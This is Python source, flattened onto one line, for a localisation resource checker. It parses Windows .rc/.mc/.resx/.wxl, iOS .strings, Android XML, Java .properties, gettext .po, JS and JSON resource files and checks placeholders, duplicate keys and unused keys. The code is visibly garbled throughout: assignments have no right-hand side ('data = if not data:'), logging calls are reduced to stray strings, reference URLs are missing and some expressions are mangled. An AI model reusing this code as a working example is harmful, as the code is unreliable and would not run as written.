PY.Regex(R"#elif.*") | PY.Regex(R"#endif.*") # add for Receiver for Windows key_value_pair = (PY.Group(key + value) | define_patterns.suppress()).ignore(PY.cppStyleComment).parseWithTabs() white_char = PY.Word(string.whitespace, exact = 1) string_table = (white_char + PY.Literal("STRINGTABLE") + white_char).suppress() + PY.SkipTo((white_char + PY.Literal("BEGIN") + white_char) | PY.Literal("{"), ignore = PY.dblQuotedString | PY.cppStyleComment | define_patterns, include = True).suppress() + PY.originalTextFor(PY.SkipTo((white_char + PY.Literal("END") + (white_char | PY.stringEnd)) | PY.Literal("}"), ignore = PY.dblQuotedString | PY.cppStyleComment | define_patterns, include = True)) #string_table_sign = (white_char + PY.Literal("STRINGTABLE") + white_char).suppress() + PY.SkipTo(PY.Literal("{"), ignore = PY.dblQuotedString | PY.cppStyleComment | define_patterns, include = True).suppress() + PY.originalTextFor(PY.SkipTo(PY.Literal("}"), ignore = PY.dblQuotedString | PY.cppStyleComment | define_patterns, include = True)) string_table = string_table.ignore(PY.cppStyleComment).parseWithTabs().leaveWhitespace() return string_table, key_value_pair def get_placeholder_pattern(self): #reference:, positive_integer = PY.Word("123456789", PY.nums) integer = PY.Literal("0") | positive_integer flags = PY.Word("-+ #0") width = integer | PY.Literal("*") precision = PY.Literal(".") + width type_prefix = PY.Literal("ll") | PY.Literal("l") | PY.Literal("I32") | PY.Literal("I64") | PY.Literal("I") | PY.Literal("h") | PY.Literal("w") type_flag = PY.Word("cCdiouxXeEfgGaAnpsSZ", exact = 1) format_string_body = PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + PY.Optional(type_prefix) + type_flag special_characters = PY.Combine(PY.Literal("%") + PY.Word("0% .!nrt", exact = 1)) format_string = PY.Combine(PY.Literal("%") + format_string_body) numbered_format_string = PY.Combine(PY.Literal("%") + positive_integer + PY.Optional(PY.Literal("!") + format_string_body + PY.Literal("!"))) placeholder_pattern = PY.originalTextFor(numbered_format_string | format_string | special_characters) return placeholder_pattern class Rc2ResFile(RcResFile): pass class Rc2ResDetector(RcResDetector): pass class McResFile(BaseResFile): #reference : def parse(self, parsing_patterns): data = if not data: LOG.warning("There is no data in file '{path}'".format(path = self.path)) return try: key_value_pair = parsing_patterns for tokens, start_location, end_location in key_value_pair.scanString(data): key = tokens[0] value = tokens[1] if key in self.keys: self.duplicate_keys.append(key) self.keys.add(key) self.values.append(value) self.key_value_pairs[key] = value self.item_count += 1 except Exception as e: LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e)) self.reset_value_containers() return class McResDetector(BaseResDetector): def get_parsing_patterns(self): comment = PY.Regex(R";/(?:\*(?:[^*]*;\*+)+?/|/[^\n]*(?:\n[^\n]*)*?(?:(?<!\\)|\Z))") #comment = PY.Regex(R";.*") #this kind of comments are used in some projects variable = PY.Word(PY.alphanums + "_", PY.alphanums + "_") message_key = PY.Literal("MessageId") + PY.Literal("=") + PY.Optional(PY.Optional(PY.Literal("+")) + variable) severity = PY.Literal("Severity") + PY.Literal("=") + variable facility = PY.Literal("Facility") + PY.Literal("=") + variable symbolic_name = (PY.Literal("SymbolicName") + PY.Literal("=")).suppress() + variable output_base = PY.Literal("OutputBase") + PY.Literal("=") + PY.Optional(PY.Literal("{")) + variable + PY.Optional(PY.Literal("}")) language = PY.Literal("Language") + PY.Literal("=") + variable message_value = PY.SkipTo(PY.lineStart + PY.Literal(".")).setParseAction(lambda s, l, t: t[0].strip()) #comment out below pattern since severity/facility/symbolic items can be in any order in reality, not like MSDN says... #key_value_pair = message_key.suppress() + PY.Optional(severity).suppress() + PY.Optional(facility).suppress() + symbolic_name + PY.Optional(output_base).suppress() + PY.Optional(language).suppress() + message_value careless_item = language | severity | facility | output_base key_value_pair = message_key.suppress() + PY.ZeroOrMore(careless_item).suppress() + symbolic_name + PY.ZeroOrMore(careless_item).suppress() + message_value return key_value_pair.ignore(comment).parseWithTabs() def get_placeholder_pattern(self): #reference : and the links ont the page positive_integer = PY.Word("123456789", PY.nums) integer = PY.Literal("0") | positive_integer flags = PY.Word("-#0") width = integer precision = PY.Literal(".") + PY.Optional(integer) type_flag = PY.Word("h", "cCdsSu", exact = 2) | PY.Word("l", "cCdisSuxX", exact = 2) | PY.Word("cCdipsSu", exact = 1) format_string_body = PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + type_flag special_characters = PY.Combine(PY.Literal("%") + PY.Word("0.!%nbr", exact = 1)) numbered_format_string = PY.Combine(PY.Literal("%") + positive_integer + PY.Optional(PY.Literal("!") + format_string_body + PY.Literal("!"))) placeholder_pattern = PY.originalTextFor(numbered_format_string | special_characters) return placeholder_pattern class ResxResFile(BaseResFile): def parse(self, parsing_patterns = None): data = if not data: LOG.warning("There is no data in file '{path}'".format(path = self.path)) return try: root = ET.fromstring(data) #escape_pattern = None # need to add whether there is an escape error, no need for now since parseError will be thrown in current implementation for elem in root.findall("data"): key = elem.get("name") if key is None: continue #filter strings from all values parsed if ("." in key) and (not key.endswith(".Text")): continue #if there is no child named "value" under "data", the actual value in C# project is null, we set it to "" in order to save effort to handle it #if there is no text in "value" node, the actual value in C# project is "" value = "" sub_elem = elem.find("value") if sub_elem != None: value = "".join(sub_elem.itertext()) if key in self.keys: self.duplicate_keys.append(key) #if escape_pattern.match(value): # self.escape_error_keys.append(key) self.keys.add(key) self.values.append(value) self.key_value_pairs[key] = value self.item_count += 1 except Exception as e: LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e)) self.reset_value_containers() return class ResxResDetector(BaseResDetector): def is_translation_necessary(self, value): return (BaseResDetector.is_translation_necessary(self, value) and (not "PublicKeyToken" in value)) def get_placeholder_pattern(self): return PY.Literal("{").suppress() + PY.Word(PY.nums) + PY.Literal("}").suppress() class ReswResFile(ResxResFile): pass class ReswResDetector(ResxResDetector): pass class WxlResFile(BaseResFile): # Maybe the most effeicent way is to get the last five character of the pure file name when determining the language based on the file name def get_language(self): sub_names = self.file.lower().split(".") try: sub_name = sub_names[-2] if sub_name in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[sub_name] except IndexError: pass for sub_name in sub_names: if sub_name in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[sub_name] #sometimes the file name is like agee_zh-CN.wxl sub_names = self.file.lower().replace("." + self.extension, "").split("_") try: sub_name = sub_names[-1] if sub_name in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[sub_name] except IndexError: pass for sub_name in sub_names: if sub_name in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[sub_name] #sometimes the file name is like Dmc-de-de.wxl try: sub_name = self.file.lower()[-9:-4] if sub_name in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[sub_name] except Exception: pass sub_dirs = try: sub_dir = sub_dirs[-1] if sub_dir in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[sub_dir] except IndexError: pass #Is the following necessary? Do we need to decide whether the other sub directory is language id besides the last sub directory? for sub_dir in sub_dirs: if sub_dir in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[sub_dir] return BASE_LANGUAGE def get_group_id(self): #Maybe the most efficient way to get adjusted file name is sef.file[0:-9] sub_names = self.file.split(".") file_adjusted = "" for sub_name in sub_names: if not sub_name.lower() in STANDARDIZED_LANGUAGES.keys(): file_adjusted += sub_name #sometimes the file name is like agee_zh-CN.wxl if "".join(sub_names) == file_adjusted: file_adjusted = "" sub_names = self.file.replace("." + self.extension, "").split("_") for sub_name in sub_names: if not sub_name.lower() in STANDARDIZED_LANGUAGES.keys(): file_adjusted += sub_name file_adjusted = file_adjusted + "." + self.extension #sometimes the file name is like Dmc-de-de.wxl if ("_".join(sub_names) + "." + self.extension) == file_adjusted: file_adjusted = self.file[0:-9] sub_dirs = dir_adjusted = sub_dirs index = 0 for sub_dir in sub_dirs: if sub_dir.lower() in STANDARDIZED_LANGUAGES.keys(): dir_adjusted.remove(sub_dir) break index += 1 return file_adjusted, os.sep.join(dir_adjusted), index def parse(self, parsing_patterns = None): data = if not data: LOG.warning("There is no data in file '{path}'".format(path = self.path)) return try: root = ET.fromstring(data) #escape_pattern = None # need to add whether there is an escape error, no need for now since parseError will be thrown in current implementation for elem in root.iter(): if elem.tag.endswith("String"): key = elem.get("Id") if key is None: continue value = "".join(elem.itertext()) if key in self.keys: self.duplicate_keys.append(key) #if escape_pattern.match(value): # self.escape_error_keys.append(key) self.keys.add(key) self.values.append(value) self.key_value_pairs[key] = value self.item_count += 1 except Exception as e: LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e)) self.reset_value_containers() return class WxlResDetector(BaseResDetector): def get_placeholder_pattern(self): variable = PY.Word(PY.alphas + "_", PY.alphanums + "_") number = PY.Literal("0") | PY.Word("123456789", PY.nums) placeholder_pattern = PY.originalTextFor((PY.Literal("[") + (variable | number) + PY.Literal("]")) | (PY.Literal("{") + PY.Literal("\\") + variable + PY.Literal("}"))) return placeholder_pattern class StrResFile(BaseResFile): def get_language(self): sub_names = os.path.basename(".") if len(sub_names) > 1: language = sub_names[-2] if language in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[language] else: for language in sub_names: if language in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[language] return BASE_LANGUAGE else: return BASE_LANGUAGE def get_group_id(self): return self.file, os.path.dirname( def parse(self, parsing_patterns = None): data = if not data: LOG.warning("There is no data in file '{path}'".format(path = self.path)) return try: variable = PY.Word(PY.alphas + "_", PY.alphanums + "_") key_pattern = variable | PY.dblQuotedString value_pattern = PY.dblQuotedString key_value_pair = key_pattern + PY.Literal("=").suppress() + value_pattern + PY.Literal(";").suppress() escape_pattern = re.compile(".*(?<!\\\)\".*") for token, start_location, end_location in key_value_pair.ignore(PY.cppStyleComment).scanString(data): key = token[0] value = token[1] pure_value = value[1:-1] if key in self.keys: self.duplicate_keys.append(key) if escape_pattern.match(pure_value): self.escape_error_keys.append(key) self.keys.add(key) self.values.append(pure_value) self.key_value_pairs[key] = pure_value self.item_count += 1 except Exception as e: LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e)) self.reset_value_containers() return class StrResDetector(BaseResDetector): def get_placeholder_pattern(self): #reference:, #can only detect placeholders, do not make sure they are legal positive_integer = PY.Word("123456789", PY.nums) index = positive_integer + PY.Literal("$") flags = PY.Word("'-+ #0") width = positive_integer | (PY.Literal("*") + PY.Optional(positive_integer + PY.Literal("$"))) precision = PY.Literal(".") + width length_modifier = PY.Literal("hh") | PY.Literal("ll") | PY.Word("hljztqL", exact = 1) conversion_specifier = PY.Word("@sdiouUxXfFeEgGaAcpnCS%", exact = 1) placeholder_pattern = PY.originalTextFor(PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + PY.Optional(length_modifier) + conversion_specifier)) return placeholder_pattern class XibResFile(StrResFile): def parse(self, parsing_patterns = None): data = if not data: LOG.warning("There is no data in file '{path}'".format(path = self.path)) return try: self.keys.add("KeyPlaceholder") self.values.append("ValuePlaceholder") self.key_value_pairs["KeyPlaceholder"] = "ValuePlaceholder" self.item_count += 1 except Exception as e: LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e)) self.reset_value_containers() return class XibResDetector(BaseResDetector): def get_detect_issues(self): if self.config.use_user_config:"Reading issue types to be detected from configuration file...") self.detect_issues = getattr(self.config.config_module, self.config.detect_issues_attrs[self.res_file_type], []) else:"Getting default issue types to be detected...") self.detect_issues = [] class XmlResFile(BaseResFile): def get_language(self): sub_names = os.path.basename("-") count = len(sub_names) if count == 1: return BASE_LANGUAGE elif count > 1: for i in range(1, count): language = sub_names[i] if language in STANDARDIZED_LANGUAGES.keys(): result = STANDARDIZED_LANGUAGES[language] if i + 1 < count and sub_names[i + 1].startswith("r"): language = sub_names[i] + "-" + sub_names[i + 1] if language in STANDARDIZED_LANGUAGES.keys(): result = STANDARDIZED_LANGUAGES[language] return result return BASE_LANGUAGE else: LOG.critical("A fatal error occurred when determining the language of file '{path}'".format(path = self.path)) quit_application(-1) def get_group_id(self): sub_names = os.path.basename("-") base_name_adjusted = "" count = len(sub_names) region_flag = False for i in range(count): sub_name = sub_names[i] if (not sub_name in STANDARDIZED_LANGUAGES.keys()) and (not region_flag): base_name_adjusted += sub_name elif not region_flag: if i + 1 < count and sub_names[i + 1].startswith("r"): language = sub_name + "-" + sub_names[i + 1] if language in STANDARDIZED_LANGUAGES.keys(): region_flag = True else: region_flag = False return self.file, base_name_adjusted, os.path.dirname( def parse(self, parsing_patterns = None): data = if not data: LOG.warning("There is no data in file '{path}'".format(path = self.path)) return try: def get_value_info(value): if value and len(value) >1: if value[0] == '"' and value[-1] == '"': return value[1:-1], '"' elif value[0] == "'" and value[-1] == "'": return value[1:-1], "'" else: return value, None else: return value, None root = ET.fromstring(data) #apostrophe_pattern = re.compile(".*(?<!\\\)'.*") #quote_pattern = re.compile(".*(?<!\\\)\".*") for elem in root.iter(): if elem.tag == "string": key = elem.get("name") if key is None: continue value = "".join(elem.itertext()) pure_value, opener_closer = get_value_info(value) if key in self.keys: self.duplicate_keys.append(key) #if (apostrophe_pattern.match(value) and (value[0] != "\"" or value[-1] != "\"")) or (quote_pattern.match(value) and (value[0] != "'" or value[-1] != "'")): #self.escape_error_keys.append(key) self.keys.add(key) self.values.append(pure_value) self.key_value_pairs[key] = pure_value self.item_count += 1 elif elem.tag == "string-array": key_prefix = elem.get("name") if key_prefix is None: continue index = 0 for sub_elem in elem.findall("item"): key = key_prefix + "#" + str(index) index = index + 1 value = "".join(sub_elem.itertext()) pure_value, opener_closer = get_value_info(value) if key in self.keys: self.duplicate_keys.append(key) self.keys.add(key) self.values.append(pure_value) self.key_value_pairs[key] = pure_value self.item_count += 1 elif elem.tag == "plurals": key_prefix = elem.get("name") if key_prefix is None: continue for sub_elem in elem.findall("item"): quantity = sub_elem.get("quantity") if quantity is None: continue key = key_prefix + "#" + quantity value = "".join(sub_elem.itertext()) pure_value, opener_closer = get_value_info(value) if key in self.keys: self.duplicate_keys.append(key) self.keys.add(key) self.values.append(pure_value) self.key_value_pairs[key] = pure_value self.item_count += 1 except Exception as e: LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e)) self.reset_value_containers() return class XmlResDetector(BaseResDetector): def get_placeholder_pattern(self): #reference : #need to check official document in future positive_integer = PY.Word("123456789", PY.nums) index = positive_integer + PY.Literal("$") sign = PY.Word("+- 0,(#<") string_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Literal("s")) integer_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(sign) + PY.Optional(positive_integer) + PY.Word("doxX", exact = 1)) float_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(sign) + PY.Optional(positive_integer) + PY.Optional("." + positive_integer) + PY.Word("eEfgGaA", exact = 1)) character_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(PY.Literal("-")) + PY.Literal("c")) percent_pattern = PY.Literal("%%") newline_pattern = PY.Literal("%n") time_pattern = PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Literal("t") + PY.Word("cFDrTRHIklMSLNpzZsQBbhAaCYyjmde", exact = 1)) placeholder_pattern = PY.originalTextFor(string_pattern | percent_pattern | newline_pattern | integer_pattern | float_pattern | character_pattern | time_pattern) return placeholder_pattern class ProResFile(BaseResFile): def get_language(self): pure_name_end = 0 - len(".properties") sub_names = self.file[0:pure_name_end].lower().split("_") count = len(sub_names) if count == 1: if sub_names[0] in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[sub_names[0]] return BASE_LANGUAGE elif count > 1: language = sub_names[-2] + "-" + sub_names[-1] if language in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[language] else: language = sub_names[-1] if language in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[language] else: return BASE_LANGUAGE else: LOG.critical("A fatal error occurred when determining the language of file '{path}'".format(path = self.path)) quit_application(-1) def get_group_id(self): pure_name_end = 0 - len(".properties") sub_names = self.file[0:pure_name_end].lower().split("_") file_adjusted = "" count = len(sub_names) if count == 1: if sub_names[0] not in STANDARDIZED_LANGUAGES.keys(): file_adjusted = sub_names[0] elif count > 1: language = sub_names[-2] + "-" + sub_names[-1] if language in STANDARDIZED_LANGUAGES.keys(): file_adjusted = "_".join(sub_names[0:-2]) else: language = sub_names[-1] if language in STANDARDIZED_LANGUAGES.keys(): file_adjusted = "_".join(sub_names[0:-1]) else: file_adjusted = "_".join(sub_names[0:]) else: LOG.critical("A fatal error occurred when determining the language of file '{path}'".format(path = self.path)) quit_application(-1) return file_adjusted, def parse(self, parsing_patterns = None): data = if not data: LOG.warning("There is no data in file '{path}'".format(path = self.path)) return try: normal_white_spaces = " \t\f" white_spaces = " \t\f\r\n" comment_starts = "#!" key_terminators = ":=" + normal_white_spaces class LineType(Enum): comment = 0 blank = 1 natural = 2 logic = 3 def is_escape_character(line_string, index): if index < 0: return False if line_string[index] != "\\": return False index -= 1 backslash_count = 1 while index >= 0 and line_string[index] == "\\": index -= 1 backslash_count += 1 if backslash_count % 2: return True else: return False def get_line_information(line_string): line_type = None pure_len = len(line_string) for char in line_string: if char not in white_spaces: if char in comment_starts: line_type = LineType.comment else: if line_string.endswith("\r\n"): if is_escape_character(line_string, pure_len - 3): line_type = LineType.logic pure_len -= 3 if line_string.lstrip(normal_white_spaces) == "\\\r\n": line_type = LineType.blank pure_len = 0 else: line_type = LineType.natural pure_len -= 2 elif line_string.endswith("\n") or line_string.endswith("\r"): if is_escape_character(line_string, pure_len - 2): line_type = LineType.logic pure_len -= 2 tailing_line_string = line_string.lstrip(normal_white_spaces) if tailing_line_string == "\\\n" or tailing_line_string == "\\\r": line_type = LineType.blank pure_len = 0 else: line_type = LineType.natural pure_len -= 1 else: raise Exception("Unexpected line end detected") break else: line_type = LineType.blank pure_len = 0 return line_type, pure_len def parse_start_from_key(line_string, pure_len): key_start = 0 value_end = 0 value = "" is_key_uncompleted = False while key_start < pure_len: if line_string[key_start] not in normal_white_spaces: break key_start += 1 else: raise Exception("No non-whitespace character found, this should not happen") key_end = key_start while key_end < pure_len: if (line_string[key_end] in key_terminators) and (not is_escape_character(line_string, key_end - 1)): break key_end += 1 else: is_key_uncompleted = True return line_string[key_start:key_end], value, is_key_uncompleted value_start = key_end symbol_not_found = True while value_start < pure_len: if line_string[value_start] in normal_white_spaces: value_start += 1 elif symbol_not_found and line_string[value_start] in "=:": symbol_not_found = False value_start += 1 else: break if value_start == pure_len: value_start = 0 value_end = 0 else: value_end = pure_len return line_string[key_start:key_end], line_string[value_start:value_end], is_key_uncompleted def parse_start_from_value(line_string, pure_len): value_start = 0 value_end = 0 while value_start < pure_len: if line_string[value_start] in normal_white_spaces: value_start += 1 else: break if value_start == pure_len: raise Exception("No non-whitespace character found, this should not happen") else: value_end = pure_len return line_string[value_start:value_end] line_strings = data.splitlines(keepends = True) if not (line_strings[-1].endswith("\n") or line_strings[-1].endswith("\r")): line_strings[-1] += "\n" line_count = len(line_strings) line_index = 0 last_line_type = LineType.natural is_key_uncompleted = True key = "" value = "" while line_index < line_count: line_string = line_strings[line_index] line_type, pure_len = get_line_information(line_string) if line_type == LineType.blank: line_index += 1 elif line_type == LineType.comment: line_index += 1 elif line_type == LineType.natural: if last_line_type == LineType.natural: key, value, is_key_uncompleted = parse_start_from_key(line_string, pure_len) if key in self.keys: self.duplicate_keys.append(key) self.keys.add(key) self.values.append(value) self.key_value_pairs[key] = value self.item_count += 1 elif last_line_type == LineType.logic: if is_key_uncompleted: partial_key, value, is_key_uncompleted = parse_start_from_key(line_string, pure_len) key += partial_key if key in self.keys: self.duplicate_keys.append(key) self.keys.add(key) self.values.append(value) self.key_value_pairs[key] = value self.item_count += 1 else: partial_value = parse_start_from_value(line_string, pure_len) value += partial_value if key in self.keys: self.duplicate_keys.append(key) self.keys.add(key) self.values.append(value) self.key_value_pairs[key] = value self.item_count += 1 else: raise Exception("Unexpected line type") last_line_type = LineType.natural line_index += 1 elif line_type == LineType.logic: if last_line_type == LineType.natural: key, value, is_key_uncompleted = parse_start_from_key(line_string, pure_len) elif last_line_type == LineType.logic: if is_key_uncompleted: partial_key, value, is_key_uncompleted = parse_start_from_key(line_string, pure_len) key += partial_key else: partial_value = parse_start_from_value(line_string, pure_len) value += partial_value else: raise Exception("Unexpected line type") last_line_type = LineType.logic line_index += 1 else: raise Exception("Unexpected line type, this should not happen") except Exception as e: LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e)) self.reset_value_containers() return class ProResDetector(BaseResDetector): #[TODO], def get_placeholder_pattern(self): return PY.Literal("{").suppress() + PY.Word(PY.nums) + PY.Literal("}").suppress() class PoResFile(BaseResFile): #reference: & def parse(self, parsing_patterns = None): data = if not data: LOG.warning("There is no data in file '{path}'".format(path = self.path)) return try: #TODO Support plurals string_pattern = PY.OneOrMore(PY.dblQuotedString.copy()).setParseAction(lambda s, l, t: "".join([i[1:-1] for i in t])) key_value_pair = PY.Optional(PY.Literal("msgctxt").suppress() + string_pattern) + PY.Literal("msgid").suppress() + string_pattern + PY.Literal("msgstr").suppress() + string_pattern for tokens, start, end in key_value_pair.ignore(PY.pythonStyleComment).parseWithTabs().scanString(data): if len(tokens) == 3: key = tokens[0] + "#" + tokens[1] value = tokens[2] else: key = tokens[0] value = tokens[1] if key in self.keys: self.duplicate_keys.append(key) self.keys.add(key) self.values.append(value) self.key_value_pairs[key] = value self.item_count += 1 except Exception as e: LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e)) self.reset_value_containers() return class PoResDetector(BaseResDetector): #Since only this function is overrided and the logic is the same as that in StrResDetector, this class can derive StrResDetector to reuse code def get_placeholder_pattern(self): #reference: positive_integer = PY.Word("123456789", PY.nums) index = positive_integer + PY.Literal("$") flags = PY.Word("'-+ #0") width = positive_integer | (PY.Literal("*") + PY.Optional(positive_integer + PY.Literal("$"))) precision = PY.Literal(".") + width length_modifier = PY.Literal("hh") | PY.Literal("ll") | PY.Word("hljztqL", exact = 1) conversion_specifier = PY.Word("@sdiouUxXfFeEgGaAcpnCS%", exact = 1) placeholder_pattern = PY.originalTextFor(PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + PY.Optional(length_modifier) + conversion_specifier)) return placeholder_pattern class TokResFile(BaseResFile): def parse(self, parsing_patterns = None): data = if not data: LOG.warning("There is no data in file '{path}'".format(path = self.path)) return try: digit_value = PY.Word(string.digits + string.punctuation + string.whitespace).leaveWhitespace().parseWithTabs() key_value_pair = PY.originalTextFor(PY.Literal("[[") + (PY.Word(PY.nums) + PY.Literal("|")) * 5 + PY.dblQuotedString + PY.Literal("]]")) + PY.Literal("=").suppress() + PY.SkipTo(PY.lineEnd) for tokens, start, end in key_value_pair.parseWithTabs().scanString(data): key = tokens[0] value = tokens[1] if not value: continue try: digit_value.parseString(value, parseAll = True) except PY.ParseException: pass else: continue if key in self.keys: self.duplicate_keys.append(key) self.keys.add(key) self.values.append(value) self.key_value_pairs[key] = value self.item_count += 1 except Exception as e: LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e)) self.reset_value_containers() return class TokResDetector(BaseResDetector): #Since only this function is overrided and the logic is the same as that in StrResDetector, this class can derive StrResDetector to reuse code def get_placeholder_pattern(self): #reference: positive_integer = PY.Word("123456789", PY.nums) index = positive_integer + PY.Literal("$") flags = PY.Word("'-+ #0") width = positive_integer | (PY.Literal("*") + PY.Optional(positive_integer + PY.Literal("$"))) precision = PY.Literal(".") + width length_modifier = PY.Literal("hh") | PY.Literal("ll") | PY.Word("hljztqL", exact = 1) conversion_specifier = PY.Word("@sdiouUxXfFeEgGaAcpnCS%", exact = 1) placeholder_pattern = PY.originalTextFor(PY.Combine(PY.Literal("%") + PY.Optional(index) + PY.Optional(flags) + PY.Optional(width) + PY.Optional(precision) + PY.Optional(length_modifier) + conversion_specifier)) return placeholder_pattern class JsResFile(BaseResFile): def get_language(self): base_name = os.path.basename( if base_name == "root": return BASE_LANGUAGE elif base_name in STANDARDIZED_LANGUAGES.keys(): return STANDARDIZED_LANGUAGES[base_name] else: LOG.critical("'{language}' is not pre-defined in {application}, please contact tool author".format(language = base_name, application = __application__)) quit_application(-1) def get_group_id(self): return self.file, os.path.dirname( def parse(self, parsing_patterns = None): data = if not data: LOG.warning("There is no data in file '{path}'".format(path = self.path)) return try: key_pattern = (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) value_pattern = PY.SkipTo((PY.Literal(",") | PY.Literal("\r\n") | PY.Literal("}")), include = False, ignore = PY.quotedString|PY.cppStyleComment).setParseAction(lambda t: t[0].rstrip("\r\n").rstrip(",").strip(" \t")) comment = PY.cppStyleComment key_value_pattern = (key_pattern | (PY.Literal("\"").suppress() + key_pattern + PY.Literal("\"").suppress()) | (PY.Literal("'").suppress() + key_pattern + PY.Literal("'").suppress())) + PY.Literal(":").suppress() + value_pattern escape_pattern = re.compile("'.*(?<!\\\)'.*'|\".*(?<!\\\)\".*\"") for tokens, start, end in key_value_pattern.ignore(comment).scanString(data): key = tokens[0] value = tokens[1] pure_value = value[1:-1] if key in self.keys: self.duplicate_keys.append(key) if escape_pattern.match(value): if not "+" in value: self.escape_error_keys.append(key) else: for sub_string in value.split("+"): if escape_pattern.match(sub_string.strip(" \t")): self.escape_error_keys.append(key) self.keys.add(key) self.values.append(pure_value) self.key_value_pairs[key] = pure_value self.item_count += 1 except Exception as e: LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e)) self.reset_value_containers() return class JsResDetector(BaseResDetector): def get_placeholder_pattern(self): return PY.Combine(PY.Literal("#").suppress() + PY.Word(PY.alphanums, PY.alphanums + "-") + PY.Literal("#").suppress()) def get_res_keys_and_src_keys(self): res_keys = set() for res_file_group in self.res_file_groups: if res_file_group.base_res_file: res_keys = res_keys | res_file_group.base_res_file.keys src_keys = set() src_key_info = [] res_folder_pattern = os.sep + "nls" + os.sep for root, dirs, files in os.walk(self.src_dir): if not res_folder_pattern in (root + os.sep): for file in files: for extension in ["js", "htm", "html"]: if file.endswith(extension): src_file = BaseSrcFile(root, file, extension) for key, start, end in src_file.get_resource_keys(): src_keys.add(key) src_key_info.append((key, src_file, start, end)) return res_keys, src_keys, src_key_info def detect_unused_and_undefined_keys(self): detect_unused_key = True if IssueName.unused_key.value in self.detect_issues else False detect_improper_used_key = True if IssueName.improperly_used_key.value in self.detect_issues else False if detect_unused_key:"Detecting unused keys in resource files, which may take some time...") res_keys, src_keys, src_key_info = self.get_res_keys_and_src_keys() elif detect_improper_used_key:"Detecting undefined resource keys in source code, which may take some time...") res_keys, src_keys, src_key_info = self.get_res_keys_and_src_keys() else: return if detect_unused_key: for res_file_group in self.res_file_groups: base_res_file = res_file_group.base_res_file if not base_res_file: continue missing_keys = base_res_file.keys - src_keys for missing_key in sorted(missing_keys): issue = Issue(file = base_res_file.path, line = 0, column_begin = 0, column_begin_offset = 0, column_end = 0, code = IssueCode.unused_key, description = Description.unused_key, severity = Severity.warning, context = Context.unused_key.value.format(missing_key)) self.issues.add(issue) if detect_improper_used_key: if detect_unused_key:"Detecting undefined resource keys in source code...") for key, src_file, start, end in src_key_info: if not key in res_keys: column_begin, column_begin_offset = src_file.get_column_number_with_offset(start) issue = Issue(file = src_file.path, line = src_file.get_line_number(start), column_begin = column_begin, column_begin_offset = column_begin_offset, column_end = src_file.get_column_number(end), code = IssueCode.improperly_used_key, description = Description.improperly_used_key, severity = Severity.error, context = Context.improperly_used_key.value.format(src_file.get_line(start).strip("\r"))) self.issues.add(issue) class JsonResFile(BaseResFile): def parse(self, parsing_patterns = None): data = if not data: LOG.warning("There is no data in file '{path}'".format(path = self.path)) return def flat_dict(prefix, json_dict): for key, value in json_dict.items(): key = key if not prefix else prefix + "." + key if type(value) == str: yield key, value elif type(value) == dict: for sub_key, sub_value in flat_dict(key, value): yield sub_key, sub_value else: LOG.warning("Non-dict/str type found when getting key-value pairs from json file '{path}'".format(path = self.path)) try: for key, value in flat_dict("", json.loads(data)): if key in self.keys: self.duplicate_keys.append(key) self.keys.add(key) self.values.append(value) self.key_value_pairs[key] = value self.item_count += 1 except Exception as e: LOG.error("An error occurred when parsing key-value pairs from file '{path}': {exception}".format(path = self.path, exception = e)) self.reset_value_containers() return class JsonResDetector(BaseResDetector): def get_placeholder_pattern(self): return PY.Literal("{").suppress() + PY.Word(PY.nums) + PY.Literal("}").suppress() class BaseSrcFile: def __init__(self, directory, file, extension): = directory self.file = file self.extension = extension self.path = os.path.join(directory, file) self.code = def read(self): try: f = open(self.path, "rb") bin_data = f.close() except Exception as e: LOG.error("Cannot open file '{path}' to read: {exception}".format(path = self.path, exception = e)) return None for bom, encoding in {codecs.BOM_UTF8 : "utf_8", codecs.BOM_UTF16_BE : "utf_16_be", codecs.BOM_UTF16_LE : "utf_16_le", codecs.BOM_UTF32_BE : "utf_32_be", codecs.BOM_UTF32_LE : "utf_32_le"}.items(): if bin_data.startswith(bom): try: return bin_data[len(bom):].decode(encoding) except UnicodeDecodeError: LOG.error("Cannot read file '{path}', the real encoding 